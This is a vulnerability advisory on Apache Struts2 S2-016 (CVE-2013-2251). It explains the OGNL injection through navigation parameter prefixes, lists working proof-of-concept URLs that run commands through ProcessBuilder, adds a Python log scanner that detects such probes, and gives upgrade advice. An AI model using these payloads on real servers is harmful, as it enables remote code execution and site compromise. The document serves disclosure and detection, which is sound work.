Struts2 latest (S2-016) remote code execution vulnerability - CVE-2013-2251

Yesterday the Struts project, the well-known Java web framework, released another high-severity security update (latest version: 2.3.15.1). The upgrade fixes multiple security vulnerabilities, among them a high-severity remote arbitrary code execution flaw; the vulnerabilities affect every version from Struts 2.0.0 through Struts 2.3.15. An attacker can exploit the flaw to execute malicious Java code, ultimately leading to serious consequences such as theft of site data and defacement of web pages. In versions before Struts 2.3.15.1, the "action:", "redirect:" and "redirectAction:" parameter prefixes are not properly filtered, which leads to OGNL code execution.

Vulnerability information

Affected versions: Struts 2.0.0 - Struts 2.3.15
Impact: remote command execution
Reporter: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE ID: CVE-2013-2251

Vulnerability overview

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

Vulnerability PoC

In the Struts blank application, open the URLs below.

The parameter is evaluated as an OGNL expression:

http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

Code execution:

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
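The advisory text above explains that DefaultActionMapper treats a parameter whose name starts with "action:", "redirect:" or "redirectAction:" as a navigation target and evaluates the remainder as OGNL, and the PoC URLs show what such a parameter looks like on the wire. The following detection helper, added here and not part of Struts or the original advisory, makes that concrete from the defender's side: it parses the query string of each request in an access log, URL-decodes parameter names the way the servlet container does (so `%25{` becomes `%{`), and flags any short-circuit parameter whose remainder carries an OGNL expression marker. The log lines, hosts and paths are constructed samples; a legitimate `redirectAction:listEmployees` is included to show it is not flagged.

```python
"""Flag S2-016-style short-circuit navigation parameters in access logs.

Added example for this page (not Struts code). Parameter *names* are
inspected because DefaultActionMapper keys on the name, e.g.
"action:%{3*4}" arriving as "action:%25{3*4}". Caveat: access logs only
show the query string; the same parameter sent in a POST body is invisible
here and must be checked at the application or WAF layer.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Prefixes handled by DefaultActionMapper (longest first so the match is exact).
PREFIXES = ("redirectAction:", "redirect:", "action:")
# %{...} is the OGNL expression form used in the PoC; ${...} is also accepted by OGNL.
OGNL_MARKER = re.compile(r"[%$]\{")
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log in Apache common format (hypothetical clients and paths).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jul/2013:10:01:02 +0000] "GET /struts2-blank/example/X.action?action:%25{3*4} HTTP/1.1" 302 0
10.0.0.6 - - [18/Jul/2013:10:01:03 +0000] "GET /struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} HTTP/1.1" 302 0
10.0.0.7 - - [18/Jul/2013:10:01:04 +0000] "GET /struts2-showcase/employee/save.action?redirectAction:listEmployees HTTP/1.1" 302 0
10.0.0.8 - - [18/Jul/2013:10:01:05 +0000] "GET /struts2-blank/example/HelloWorld.action?name=World HTTP/1.1" 200 512
"""


def find_short_circuit_params(target):
    """Return (prefix, remainder) for each decoded query parameter name of
    `target` that begins with one of the DefaultActionMapper prefixes."""
    query = urlsplit(target).query
    hits = []
    # keep_blank_values=True keeps "action:%25{3*4}" even though it has no "=value".
    for name, _value in parse_qsl(query, keep_blank_values=True):
        for prefix in PREFIXES:
            if name.startswith(prefix):
                hits.append((prefix, name[len(prefix):]))
                break
    return hits


def is_suspicious(target):
    """True when a short-circuit parameter carries an OGNL expression marker."""
    return any(OGNL_MARKER.search(rest) for _prefix, rest in find_short_circuit_params(target))


def scan_log(text):
    """Return (client_ip, request_target) for every log line that looks like an
    S2-016 probe; plain navigation targets without OGNL are left alone."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        if is_suspicious(target):
            findings.append((line.split(" ", 1)[0], target))
    return findings


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"S2-016 probe from {ip}: {target}")
```

The check deliberately keys on the expression marker rather than on the prefix alone, so existing forms that legitimately use `redirectAction:someAction` do not drown the signal; on a patched 2.3.15.1 deployment a stricter variant that alerts on any use of the "redirect:" and "redirectAction:" prefixes is reasonable, since the fix changes how they are handled.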

Solution

Upgrade to Struts 2.3.15.1; download address: http://struts.apache.org/download.cgi#struts23151

The PoC comes from the official advisories:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.html